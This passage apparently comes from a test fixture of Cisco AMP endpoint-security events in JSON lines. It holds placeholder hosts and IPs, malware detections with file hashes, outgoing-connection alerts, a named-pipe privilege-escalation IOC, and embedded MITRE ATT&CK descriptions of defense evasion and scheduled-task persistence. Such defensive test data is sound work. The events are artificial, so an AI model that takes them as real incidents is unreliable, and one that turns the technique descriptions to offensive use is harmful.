Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}],"severity":"critical","incident_start_time":1610707688,"incident_end_time":1592478770},"tactics":[{"name":"Defense Evasion","description":"

The adversary is trying to avoid being detected.

\n\n

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

\n","external_id":"TA0005","mitre_name":"tactic","mitre_url":"https://attack.mitre.org/tactics/TA0005"}],"techniques":[{"name":"Data from Local System","description":"

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

\n\n

Adversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.

\n","external_id":"T1005","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1005","tactics_names":"Collection","platforms":"Linux, macOS, Windows","system_requirements":"Privileges to access certain files and directories","permissions":"","data_sources":"File monitoring, Process monitoring, Process command-line parameters"},{"name":"Scheduled Task/Job","description":"

Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)

\n\n

Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).

\n","external_id":"T1053","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1053","tactics_names":"Execution, Persistence, Privilege Escalation","platforms":"Windows, Linux, macOS","system_requirements":null,"permissions":"Administrator, SYSTEM, User","data_sources":"File monitoring, Process monitoring, Process command-line parameters, Windows event logs"},{"name":"Scripting","description":"

This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.

\n\n

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.

\n\n

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in Spearphishing Attachment and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through Exploitation for Client Execution, where adversaries will rely on macros being allowed or that the user will accept to activate them.

\n\n

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

\n","external_id":"T1064","mitre_name":"technique","mitre_url":"https://attack.mitre.org/techniques/T1064","tactics_names":"Defense Evasion, Execution","platforms":"Linux, macOS, Windows","system_requirements":null,"permissions":"User","data_sources":"Process monitoring, File monitoring, Process command-line parameters"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180352115244794000,"timestamp":1610709638,"timestamp_nanoseconds":279000000,"date":"2021-01-15T11:20:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180352115244793858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180351977805840000,"timestamp":1610709606,"timestamp_nanoseconds":548000000,"date":"2021-01-15T11:20:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:ZVETJ.18gs.1201","detection_id":"6180351977805840385","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"wsymqyv90.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\OUTLOOK_TEMP\\wsymqyv90.exe","identity":{"sha256":"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40","sha1":"70aef829bec17195e6c8ec0e6cba0ed39f97ba48","md5":"e2f5dcd966e26d54329e8d79c7201652"},"parent":{"process_id":4040,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159258594551267000,"timestamp":1610707507,"timestamp_nanoseconds":525000000,"date":"2021-01-15T10:45:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159258594551267599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iodnxvg.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\iodnxvg.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":14000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671380737589000,"timestamp":1610706458,"timestamp_nanoseconds":605000000,"date":"2021-01-15T10:27:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671380737589308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":81000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551547","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671123039551000,"timestamp":1610706398,"timestamp_nanoseconds":60000000,"date":"2021-01-15T10:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671123039551546","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671118744584000,"timestamp":1610706397,"timestamp_nanoseconds":666000000,"date":"2021-01-15T10:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671118744584249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670861046546000,"timestamp":1610706337,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:25:37+00:00","event_type":"Threat 